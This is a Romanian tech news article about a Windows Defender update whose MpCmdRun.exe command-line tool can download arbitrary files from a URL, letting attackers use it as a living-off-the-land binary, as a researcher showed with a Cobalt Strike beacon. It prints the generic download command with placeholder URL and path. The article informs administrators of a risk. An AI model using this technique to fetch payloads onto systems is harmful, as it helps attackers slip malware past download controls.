Windows Defender se transformă într-o aplicație periculoasă pentru administratori

Windows Defender în Windows 10 este prima linie de apărare în caz de atacuri malware și face o si o treaba destul de buna.

Cu toate acestea, într-una dintre noile sale actualizări, puternicul antivirus a primit o nouă comandă DownloadFile, care va permite oricui să descarce orice fișier dintr-un URL pe o anumită cale de pe computer.

Putem numi acest lucru un exploit, deoarece ar putea fi folosit și pentru a descărca chiar malware, lucru descoperit de cercetătorul în securitate Mohammad Askar care postat descoperirea sa pe Twitter.

Cum se poate utiliza Windows Defender pentru a descărca programe malware?

Este foarte simplu să folosiți Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) pentru a descărca orice fișier dintr-o sursă externă pe computer.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

În încercarea sa, Askar a reușit să descarce baliza Cobalt Strike, un cunoscut instrument de atacare care utilizează această linie de comandă.

Noua comandă este inclusă în versiune 4.18.2007.8-0 și în sus, ceea ce oferă un timp de început destul de bun pentru atacatori.

Practic, această caracteristică se transformă Windows Defender într-un LOLBIN (care trăiește din linii binare), un fișier de sistem inofensiv care poate fi utilizat în scopuri rău intenționate.

Din fericire, după ce descărcați fișierul dăunător, acesta va fi detectat de același Windows Defender sau de altul program antivirus daca prezentul.

Dintr-un software de protecție fiabil, Windows Defender s-a transformat într-o altă posibilă amenințare care va trebui monitorizată îndeaproape de administratori și experți în securitate.

Dacă aveți sugestii sau comentarii, vă rugăm să le lăsați mai jos în secțiunea Comentarii.